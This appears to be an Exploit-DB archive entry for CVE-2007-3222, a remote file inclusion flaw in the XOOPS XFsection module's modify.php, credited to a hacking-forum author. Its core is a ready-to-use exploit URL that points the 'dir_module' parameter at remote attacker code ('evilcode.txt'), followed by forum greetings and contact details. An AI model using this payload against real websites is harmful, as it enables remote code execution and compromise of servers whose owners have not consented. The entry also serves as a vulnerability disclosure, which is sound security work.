XOOPS Module XFsection - 'modify.php' Remote File Inclusion

Author: Sp[L]o1T
type: webapps
platform: php
port: 
date_added: 2007-06-12 
date_updated: 2016-10-05 
verified: 1 
codes: OSVDB-36815;CVE-2007-3222 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comxoops2-mod_xfsection-107.zip

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
XOOPS Module XFsection Remote File Inclusion
version: < 1.07
source : http://prdownloads.sourceforge.net/xoops/xoops2-mod_xfsection-107.zip
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Discovered by Sp[L]o1T from hTTp://hacking.3Xforum.Ro
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Bug : http://www.site.com/modules/xfsection/modify.php?dir_module=evilcode.txt?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Shoutz t0 : Vladiii,Johnny,Str0ke,Shocker,Epic,OSHO,Zapakitul and all members from Hacking[dot]3Xforum[dot]RO
Contact: splo1t[at]yahoo[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Note:
In some cases you will need to be authenticated.

# milw0rm.com [2007-06-13]